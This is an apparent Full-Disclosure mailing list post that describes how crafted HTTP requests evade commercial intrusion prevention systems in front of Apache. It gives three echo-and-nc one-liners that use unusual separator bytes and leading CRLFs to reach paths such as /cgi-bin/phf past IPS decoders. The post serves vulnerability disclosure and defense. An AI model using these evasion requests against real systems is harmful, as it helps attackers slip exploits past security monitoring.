IPS Evasion with the Apache HTTP Server

[H D Moore <fdlist () digitaloffense net>]

Summarized from https://strikecenter.bpointsys.com/

Many commercial IPS products fail to decode HTTP requests which use 0x0c, 
0x0b, and 0x0d instead of the normal 0x20/0x09 separators. A request in 
the following format will evade most IPS protocol decoders:

$ echo -ne "GET\x0c/cgi-bin/phf\x0cHTTP/1.0\r\n\r\n" | \
 nc webserver 80

A request which contains multiple CRLF sequences instead of a valid method 
is processed by Apache, yet ignored by most IPS engines:

$ echo -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \
 nc webserver 80

The first issue was covered more than a year ago, yet most IPS vendors 
have failed to address it. The second issue is new, as far as I know. You 
can even combine them:

$ echo -ne "\r\n\r\n\r\n\r\n\r\n\x0c/buggy.php\x0bHTTP/1.0\r\n\r\n" | \
 nc webserver 80

-HD

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/